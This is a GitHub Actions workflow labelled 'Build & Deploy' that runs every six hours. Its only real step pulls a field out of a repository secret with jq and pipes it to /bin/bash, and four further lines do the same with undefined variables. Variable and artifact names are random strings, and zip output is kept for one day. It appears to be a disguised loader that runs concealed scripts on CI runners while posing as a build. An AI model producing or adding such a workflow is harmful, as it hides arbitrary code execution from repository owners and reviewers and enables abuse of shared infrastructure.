name: Build & Deploy
on:
  workflow_dispatch:

  schedule:
    - cron: '48 0,6,12,18 * * *'
env:
  CI: true
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  agent:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Perform
        env:
          xw154: ${{ secrets.xw154 }}
        run: |
          printf '%s' "$xw154" | jq -r .gebnl469 | /bin/bash
          printf '%s' "$a772" | jq -r .wluxk595 | /bin/bash
          echo $xkcf4523 | jq -r .dh100 | /bin/bash
          echo $js25 | jq -r .riihx58214 | /bin/bash
          echo $zry7373 | jq -r .tjqd92 | /bin/bash

      - name: Upload results
        uses: actions/upload-artifact@v4
        with:
          name: RJ4rtY7Q
          path: "*.zip"
          retention-days: 1
